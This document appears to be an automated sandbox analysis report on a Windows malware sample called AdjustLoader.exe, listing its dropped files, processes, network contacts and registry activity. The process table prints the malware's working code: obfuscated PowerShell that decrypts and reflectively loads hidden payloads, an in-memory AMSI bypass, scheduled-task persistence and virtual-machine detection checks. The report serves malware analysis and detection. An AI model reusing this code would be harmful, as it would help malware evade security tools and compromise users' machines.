Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
AdjustLoader.exe
|
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AdjustLoader.exe.log
|
CSV text
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\tmp6432.tmp.bat
|
DOS batch file, ASCII text, with very long lines (5544)
|
dropped
|
|
|
|
C:\Windows\$nya-onimai3\$nya-Loli.bat
|
DOS batch file, ASCII text, with very long lines (5544)
|
dropped
|
|
|
|
C:\Windows\$nya-onimai3\$nya-Loli.vbs
|
ASCII text, with no line terminators
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_2124a9bbbc9bcd42c441356b65434d39ce58130_e3b0f337_0185b477-0237-4413-af79-4530d85e026f\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_2124a9bbbc9bcd42c441356b65434d39ce58130_e3b0f337_73110769-c974-4c3a-bd17-f03ae3957338\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_2124a9bbbc9bcd42c441356b65434d39ce58130_e3b0f337_ffa47939-e8c5-4490-9530-bc52e59e4806\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1E1C.tmp.dmp
|
Mini DuMP crash report, 15 streams, Sat Aug 31 19:46:47 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2541.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2571.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4655.tmp.dmp
|
Mini DuMP crash report, 15 streams, Sat Aug 31 19:46:58 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5029.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5098.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8844.tmp.dmp
|
Mini DuMP crash report, 15 streams, Sat Aug 31 19:46:09 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8D27.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8D67.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_14ofe3tl.ima.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_42gqzrpg.i2m.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ujtgf3f.12y.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_btntijkm.e01.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mldhitmi.fjs.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p22e0shf.5vb.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pwqb2gep.hsq.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rqcdbtsr.3kk.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tdj4tmy5.3sc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tgiboffp.sd5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vgxpybwe.rd4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wsrby4v2.o02.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_anibrtgr.vou.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_eq4drbh0.jzz.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
||
|
\Device\Null
|
ASCII text, with very long lines (1785), with CRLF line terminators
|
dropped
|
There are 27 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\AdjustLoader.exe
|
"C:\Users\user\Desktop\AdjustLoader.exe"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp6432.tmp.bat" "
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\System32\wbem\WMIC.exe
|
wmic diskdrive get Model
|
|
|
|
C:\Windows\System32\wbem\WMIC.exe
|
wmic diskdrive get Manufacturer,Model
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC;
$SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU=');
$SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq,
0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*',
''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG,
[IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose();
$klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*',
''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*',
'');}$XpYqP = 'C:\Users\user\AppData\Local\Temp\tmp6432.tmp.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach
($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX
'$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN
([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]]
('')); "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -WindowStyle Hidden
|
|
|
|
C:\Windows\System32\schtasks.exe
|
"schtasks" /create /sc MONTHLY /tn $nya-Loli_1 /F /RL HIGHEST /tr "wscript.exe 'C:\Windows\$nya-onimai3\$nya-Loli.vbs' 'C:\Windows\$nya-onimai3\$nya-Loli.bat'"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-ScheduledTask -TaskName '$nya-Loli_1'
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\System32\wscript.exe
|
wscript.exe "C:\Windows\$nya-onimai3\$nya-Loli.vbs" "C:\Windows\$nya-onimai3\$nya-Loli.bat"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" "
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\System32\wbem\WMIC.exe
|
wmic diskdrive get Model
|
|
|
|
C:\Windows\System32\wscript.exe
|
wscript.exe "C:\Windows\$nya-onimai3\$nya-Loli.vbs" "C:\Windows\$nya-onimai3\$nya-Loli.bat"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" "
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\System32\wbem\WMIC.exe
|
wmic diskdrive get Model
|
|
|
|
C:\Windows\System32\wbem\WMIC.exe
|
wmic diskdrive get Manufacturer,Model
|
|
|
|
C:\Windows\System32\wbem\WMIC.exe
|
wmic diskdrive get Manufacturer,Model
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC;
$SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU=');
$SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq,
0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*',
''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG,
[IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose();
$klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*',
''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*',
'');}$XpYqP = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach
($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX
'$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN
([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]]
('')); "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -WindowStyle Hidden
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC;
$SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU=');
$SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq,
0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*',
''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG,
[IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose();
$klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*',
''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*',
'');}$XpYqP = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach
($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX
'$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN
([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]]
('')); "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -WindowStyle Hidden
|
|
|
|
C:\Windows\System32\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\System32\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:TnoNKHHDUXvA{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wrAnTRmMMLZATy,[Parameter(Position=1)][Type]$iejhPFpNZp)$FisCHMOcbia=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object
Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+'e'+[Char](99)+'t'+'e'+''+'d'+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'g'+'a'+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+'e',''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+'l'+[Char](101)+'d,'+'A'+''+'n'+'s'+[Char](105)+'C'+'l'+''+[Char](97)+''+'s'+'s,'+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+'C'+'l'+''+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$FisCHMOcbia.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+'i'+''+'d'+'e'+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$wrAnTRmMMLZATy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$FisCHMOcbia.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+',H'+[Char](105)+'d'+'e'+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+''+'S'+'l'+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+'a'+''+[Char](108)+'',$iejhPFpNZp,$wrAnTRmMMLZATy).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+''+','+''+'M'+'a'+[Char](110)+'a'+'g'+''+'e'+''+[Char](100)+'');Write-Output
$FisCHMOcbia.CreateType();}$beUOypwDoUbYD=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache
-And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType('M'+[Char](105)+'cro'+[Char](115)+''+'o'+'f'+'t'+'.'+'W'+''+[Char](105)+'n32'+[Char](46)+'U'+'n'+'s'+'a'+''+[Char](102)+''+'e'+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+'e'+'t'+''+'h'+'o'+[Char](100)+''+[Char](115)+'');$KgjvIGVxEVSZGV=$beUOypwDoUbYD.GetMethod(''+'G'+''+[Char](101)+'t'+[Char](80)+''+[Char](114)+'o'+'c'+'A'+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object
IntPtr).GetType(),[string]),$Null);$LwazNVXndbOnNGQThDI=TnoNKHHDUXvA @([String])([IntPtr]);$NNTvoeBCSSTtWDXiVNKSZk=TnoNKHHDUXvA
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XiJBUNnkSWN=$beUOypwDoUbYD.GetMethod(''+[Char](71)+'e'+[Char](116)+''+'M'+''+'o'+''+[Char](100)+'u'+'l'+'e'+[Char](72)+''+'a'+'n'+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+'n'+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$NIFilsXpyGNtBG=$KgjvIGVxEVSZGV.Invoke($Null,@([Object]$XiJBUNnkSWN,[Object](''+'L'+''+[Char](111)+'ad'+'L'+''+[Char](105)+''+'b'+''+'r'+'ary'+[Char](65)+'')));$FVXDSLjzzDTMpWqHV=$KgjvIGVxEVSZGV.Invoke($Null,@([Object]$XiJBUNnkSWN,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+'l'+''+[Char](80)+''+'r'+'o'+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$QxbfLVI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NIFilsXpyGNtBG,$LwazNVXndbOnNGQThDI).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'');$kmefLeFZtUxOoKQtH=$KgjvIGVxEVSZGV.Invoke($Null,@([Object]$QxbfLVI,[Object](''+'A'+''+'m'+''+[Char](115)+'iS'+[Char](99)+''+[Char](97)+''+[Char](110)+'B'+[Char](117)+''+'f'+'fer')));$nJBVDYOXmv=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FVXDSLjzzDTMpWqHV,$NNTvoeBCSSTtWDXiVNKSZk).Invoke($kmefLeFZtUxOoKQtH,[uint32]8,4,[ref]$nJBVDYOXmv);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$kmefLeFZtUxOoKQtH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FVXDSLjzzDTMpWqHV,$NNTvoeBCSSTtWDXiVNKSZk).Invoke($kmefLeFZtUxOoKQtH,[uint32]8,0x20,[ref]$nJBVDYOXmv);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+[Char](84)+''+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](110)+''+'y'+''+[Char](97)+''+'-'+'sta'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\System32\dllhost.exe
|
C:\Windows\System32\dllhost.exe /Processid:{bd6193ea-62bd-4d0d-9eeb-00767b2d70f2}
|
|
|
|
C:\Windows\System32\winlogon.exe
|
winlogon.exe
|
|
|
|
C:\Windows\System32\lsass.exe
|
C:\Windows\system32\lsass.exe
|
|
|
|
C:\Windows\System32\svchost.exe
|
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
|
|
|
|
C:\Windows\System32\dwm.exe
|
"dwm.exe"
|
|
|
|
C:\Windows\System32\svchost.exe
|
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
|
|
|
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
|
|
|
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
|
|
|
|
C:\Windows\System32\findstr.exe
|
findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
|
||
|
C:\Windows\System32\findstr.exe
|
findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox"
|
||
|
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 7808 -s 2540
|
||
|
C:\Windows\System32\findstr.exe
|
findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
|
||
|
C:\Windows\System32\findstr.exe
|
findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
|
||
|
C:\Windows\System32\findstr.exe
|
findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox"
|
||
|
C:\Windows\System32\findstr.exe
|
findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox"
|
||
|
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 1420 -s 2288
|
||
|
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 1420 -s 2504
|
||
|
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 5796 -s 2352
|
||
|
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 5796 -s 2476
|
There are 43 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
|
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2004/09/policy
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/erties
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://crl.micro/pki/crl/productCerAut_2010-06-2
|
unknown
|
||
|
http://www.microsoft.co
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelpX
|
unknown
|
||
|
http://upx.sf.net
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/02/trust
|
unknown
|
||
|
https://aka.ms/pscore6lBqq
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://aka.ms/pscore6xGa
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/soap12/
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://docs.oasis-open.org/ws-sx/ws-trust/200512
|
unknown
|
||
|
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
|
unknown
|
||
|
https://ipwho.is/
|
195.201.57.90
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
There are 16 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ipwho.is
|
195.201.57.90
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
83.143.112.51
|
unknown
|
Germany
|
|
|
|
195.201.57.90
|
ipwho.is
|
Germany
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
